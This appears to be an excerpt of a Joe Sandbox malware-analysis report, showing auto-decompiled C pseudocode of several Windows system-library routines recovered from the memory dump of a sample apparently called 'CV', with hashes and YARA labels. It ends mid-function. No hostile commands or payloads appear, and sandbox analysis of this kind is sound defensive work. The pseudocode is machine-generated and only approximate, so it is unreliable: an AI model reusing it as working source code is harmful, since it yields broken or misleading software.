0x012b7b68
0x012b7ae2
0x012b7ae2
0x00000000
0x012b7ae2
0x012b7b6e
0x012b7b72
0x012b7b75
0x012b7b81
0x012b7b85
0x012b7b87
0x00000000
0x00000000
0x012b7b31
0x012b7b34
0x012b7b3c
0x012b7b45
0x012b7b46
0x012b7b4f
0x012b7b51
0x012b7b57
0x012b7b59
0x012b7b59
0x00000000
0x012b7b59
0x012b7b77
0x00000000
0x012b7b77
0x012b7b2a
0x00000000
0x012b7b2a
0x012b7af1
0x012b7af3
0x00000000
0x00000000
0x012b7afb
0x012b7afc
0x012b7afe
0x00000000
0x00000000
0x012b7b00
0x012b7b03
0x00000000
0x00000000
0x012b7b05
0x012b7b09
0x012b7b0d
0x012b7b0f
0x00000000
0x00000000
0x012b7b18
0x012b7b1d
0x00000000
0x012b7b1d
0x012b7ab7
0x012b7ab9
0x00000000
0x00000000
0x012b7abf
0x012b7ac1
0x00000000
0x00000000
0x012b7ac3
0x012b7ac6
0x00000000
0x00000000
0x012b7ac8
0x012b7acc
0x012b7ad0
0x012b7ad2
0x00000000
0x00000000
0x012b7adb
0x00000000
0x012b7adb
0x012b79d6
0x012b79d9
0x012b79dc
0x012b7a91
0x012b7a94
0x00000000
0x012b7a94
0x012b79e2
0x00000000
0x012b79e2
0x012b7a74
0x012b7a7a
0x00000000
0x00000000
0x012b7a8a
0x012b7a21
0x012b7a21
0x00000000
0x012b7a21
0x0124c650
0x0124c651
0x0124c656
0x0124c65c
0x0124c65d
0x0124c663
0x0124c664
0x0124c66a
0x0124c66e
0x012b79c5
0x012b79c7
0x00000000
0x012b79c7
0x0124c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a9e97be852db56c328631e2c449df3edf6969ef7076b6d30ff7e7e6a3b8fcd
Instruction ID: 850680aab9d5faa85dd46014626243eebf1cd2751752a1e2438c1d8a44176efa
Opcode Fuzzy Hash: 85a9e97be852db56c328631e2c449df3edf6969ef7076b6d30ff7e7e6a3b8fcd
Instruction Fuzzy Hash: A08195756646028FDB26CE58C8C1ABBB7E4FBC4394F14485AEF459B281E330ED45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012C6DC9 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E012C6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E012C6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E01267D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E01289AE0();
					_t87 = L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E012C795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E012C795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E012C795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E012C795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L01264620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E012C6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E012C6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E012C6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E012C6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E01267D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E01289AE0();
								L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L01262400( &_v36);
							if(_v24 >= 0) {
								_t87 = L01262400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L01262400( &_v52);
							}
							if(_v28 >= 0) {
								return L01262400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x012c6dd4
0x012c6dde
0x012c6de1
0x012c6de3
0x012c6de6
0x012c6de9
0x012c6dec
0x012c6def
0x012c6df2
0x012c6df5
0x012c6dfe
0x012c6e04
0x012c6e09
0x012c6e0d
0x012c6e18
0x012c6e1b
0x012c6e22
0x012c6e2d
0x012c6e30
0x012c6e36
0x012c6e42
0x012c6e4d
0x012c6e50
0x012c6e55
0x012c6e5c
0x012c6e6e
0x012c6e5e
0x012c6e67
0x012c6e67
0x012c6e73
0x012c6e74
0x012c6e77
0x012c6e7c
0x012c6e7d
0x012c6e8e
0x012c6e93
0x012c6e9c
0x012c6ea8
0x012c6eab
0x012c6eac
0x012c6eb3
0x012c6ecd
0x012c6edc
0x012c6ee2
0x012c6ee5
0x012c6ef2
0x012c6efb
0x012c6f01
0x012c6f06
0x012c6f0b
0x012c6f11
0x012c6f1a
0x012c6f22
0x012c6f26
0x012c6f26
0x012c6f33
0x012c6f41
0x012c6f44
0x012c6f47
0x012c6f54
0x012c6f65
0x012c6f77
0x012c6f7c
0x012c6f82
0x012c6f91
0x012c6f99
0x012c6fa3
0x012c6fae
0x012c6fae
0x012c6fba
0x012c6fbb
0x012c6fbc
0x012c6fc1
0x012c6fc2
0x012c6fd3
0x012c6fd8
0x012c6fd8
0x012c6fdf
0x012c6fe8
0x012c6fee
0x012c6fee
0x012c6ff5
0x012c6ffb
0x012c6ffb
0x012c7004
0x00000000
0x012c700a
0x012c7004
0x012c6eb3
0x012c6e9c
0x012c7015

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 5c266897f9b68d116155c6a4eba0d2e4afde88c9b90d75f44b313ca5d72069b0
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 31717071A1020AEFDB11DFA8C984EEEBBB9FF48714F104569E605E7290D734EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012DB8D0 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E012DB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1337b9c; // 0x0
				_t124 = L01264620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01289800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E012895B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E012895D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L012677F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01289910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E012895D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1337b9c; // 0x0
									_t92 = L01264620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01289910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0124A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E012DE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E012DE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E012895B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x012db8d9
0x012db8e4
0x00000000
0x012db8e6
0x012db8f3
0x012db8f5
0x012db8f5
0x012db8f8
0x012db920
0x012db924
0x012db936
0x012db939
0x012db93d
0x012db948
0x012db9a0
0x012db9a0
0x012db9a4
0x012db9bf
0x012db9c4
0x012db9c6
0x012db9cd
0x012db9d1
0x012dbad4
0x012dbad8
0x012dbada
0x012dbadc
0x012dbadc
0x012dbadf
0x012dbae0
0x012dbae2
0x012dbae4
0x012dbaec
0x012dbaee
0x012dbaf0
0x012dbaf0
0x012dbaec
0x012dbafb
0x012dbafc
0x012dbafe
0x012dbb01
0x012dbb01
0x00000000
0x012dbb06
0x012db9d7
0x012db9db
0x012db9db
0x012db9de
0x012db9de
0x012db9e4
0x012db9e7
0x012db9ea
0x012db9ec
0x012db9ef
0x012db9f3
0x012dba1b
0x012dba1b
0x012dba23
0x012dba24
0x012dba27
0x012dba2a
0x012dba2b
0x012dba2e
0x012dba30
0x012dba37
0x012dba3f
0x012dba9c
0x012dbaa2
0x012dbb13
0x012dbb15
0x012dbaae
0x012dbaae
0x012dbab3
0x012dbab5
0x012dbaba
0x012dbac8
0x012dbac8
0x012dbaba
0x012dbacd
0x012dbacf
0x00000000
0x012dbacf
0x012dbb1a
0x00000000
0x012dbb1c
0x012dbaa7
0x012dbb11
0x00000000
0x012dbb11
0x012dbaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x012dba41
0x012dba41
0x012dba41
0x012dba58
0x012dba5d
0x012dba62
0x00000000
0x00000000
0x012dba64
0x012dba67
0x012dba68
0x012dba69
0x012dba6c
0x012dba6f
0x012dba71
0x012dba78
0x012dba80
0x00000000
0x00000000
0x012dba90
0x012dba90
0x012dba97
0x00000000
0x012dba97
0x012db9f5
0x012db9f7
0x012db9f7
0x012db9fa
0x012dba03
0x012dba07
0x012dba0c
0x012dba10
0x012dba17
0x00000000
0x012db9f7
0x012db9a6
0x012db9a8
0x012db9af
0x012db9b3
0x00000000
0x00000000
0x012db9b9
0x00000000
0x012db9b9
0x012db94d
0x012db98f
0x012db995
0x012db999
0x012db960
0x012db967
0x012db968
0x012db96a
0x00000000
0x012db96a
0x012db99b
0x012db99e
0x00000000
0x00000000
0x00000000
0x012db99e
0x012db951
0x012db954
0x012db95a
0x012db95e
0x012db972
0x012db979
0x012db97d
0x012db97f
0x012db980
0x012db982
0x012db984
0x00000000
0x012db984
0x00000000
0x012db926
0x00000000
0x012db926

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74bbed1cadc2c66618175cb4aa98de3c7048b0c68b52ae682fb95bfd99b50444
Instruction ID: f39a51f9b5390dfc9c5701e66875ca7110090a0b97825244082fd1f2315dbab2
Opcode Fuzzy Hash: 74bbed1cadc2c66618175cb4aa98de3c7048b0c68b52ae682fb95bfd99b50444
Instruction Fuzzy Hash: 3B712332260702EFEB32DF18C865F66BBE5EB46720F124528E755876E0DB74E940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012452A5 Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E012452A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0125EEF0(0x13379a0);
					_t104 =  *0x1338210; // 0xca2c10
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0125EB70(_t93, 0x13379a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01289890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0125EEF0(0x13379a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0125EB70(0, 0x13379a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xca2c1d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0127F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0125EEF0(0x13379a0);
									__eflags =  *0x1338210 - _t104; // 0xca2c10
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1338210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E012C4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0125EB70(_t95, 0x13379a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E012895D0();
											L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E012895D0();
											L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0125EB70(_t93, 0x13379a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E012895D0();
										L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E012895D0();
										L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0127F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x012452a5
0x012452ad
0x012452b0
0x012452b3
0x012452b7
0x012452ba
0x012452bf
0x012452c4
0x012452cc
0x00000000
0x00000000
0x012452ce
0x012452d9
0x012452dd
0x012452e7
0x012452f7
0x012452f9
0x012452fd
0x012a0dcf
0x012a0dd5
0x012a0dd6
0x012a0dd7
0x012a0dd8
0x012a0dd9
0x012a0dde
0x012a0ddf
0x012a0de0
0x012a0de1
0x012a0de2
0x012a0de5
0x012a0dea
0x012a0dec
0x012a0f60
0x012a0f64
0x012a0f70
0x012a0f76
0x012a0f79
0x012a0f79
0x00000000
0x012a0f64
0x012a0df2
0x012a0df7
0x012a0e04
0x012a0e0d
0x012a0e0d
0x012a0e10
0x012a0e1a
0x012a0e1c
0x012a0e4c
0x012a0e52
0x012a0e61
0x012a0e67
0x012a0e6b
0x012a0e70
0x012a0e76
0x012a0ed7
0x012a0edc
0x012a0ee0
0x012a0ee6
0x012a0eea
0x012a0eed
0x012a0ef0
0x012a0ef3
0x012a0ef6
0x012a0ef9
0x012a0efe
0x012a0f01
0x012a0f01
0x012a0f0b
0x012a0f12
0x012a0f16
0x012a0f18
0x012a0f1b
0x012a0f2c
0x012a0f31
0x012a0f31
0x012a0f35
0x012a0f39
0x012a0f3a
0x012a0f3c
0x012a0f3f
0x012a0f50
0x012a0f55
0x012a0f55
0x012a0f59
0x012452eb
0x012452f1
0x012452f1
0x012a0e7d
0x012a0e84
0x012a0e88
0x012a0e8a
0x012a0e8d
0x012a0e9e
0x012a0ea3
0x012a0ea3
0x012a0ea7
0x012a0eaf
0x012a0eb3
0x012a0eb9
0x012a0eb9
0x012a0ebc
0x012a0ecd
0x012a0ecd
0x00000000
0x012a0eb3
0x012a0e21
0x012a0e2b
0x012a0e2f
0x012a0e30
0x012a0e3a
0x012a0e3f
0x012a0e41
0x00000000
0x00000000
0x012a0e47
0x00000000
0x012a0e47
0x012a0df9
0x012a0dfe
0x00000000
0x00000000
0x00000000
0x012a0dfe
0x01245303
0x01245307
0x00000000
0x01245309
0x00000000
0x01245309
0x01245307
0x012452e9
0x012452e9
0x00000000
0x012452e9
0x0124530e
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbd01c30ced0492f76852e5d9d53b27ef13aa8af312b7f1d9945841479151b05
Instruction ID: bbb51cdf404d24d5a16756317cdc4e3d5093e601f6378fa5080a87838de0d956
Opcode Fuzzy Hash: dbd01c30ced0492f76852e5d9d53b27ef13aa8af312b7f1d9945841479151b05
Instruction Fuzzy Hash: 1351EE71225742AFD722EF28C941B2BBBE8FF90714F10091EF59587691E774E840CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 01272AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01272AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1338204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1338208; // 0x1338207
				_t8 = _t57 + 0x1338208; // 0x1338207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1338450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x133821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1336d5c; // 0x7f130654
							_t72 =  *0x1336d5c; // 0x7f130654
							_t75 =  *0x1336d5c; // 0x7f130654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1336d5c; // 0x7f130654
							_t84 =  *0x1336d5c; // 0x7f130654
							_t87 =  *0x1336d5c; // 0x7f130654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0128F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
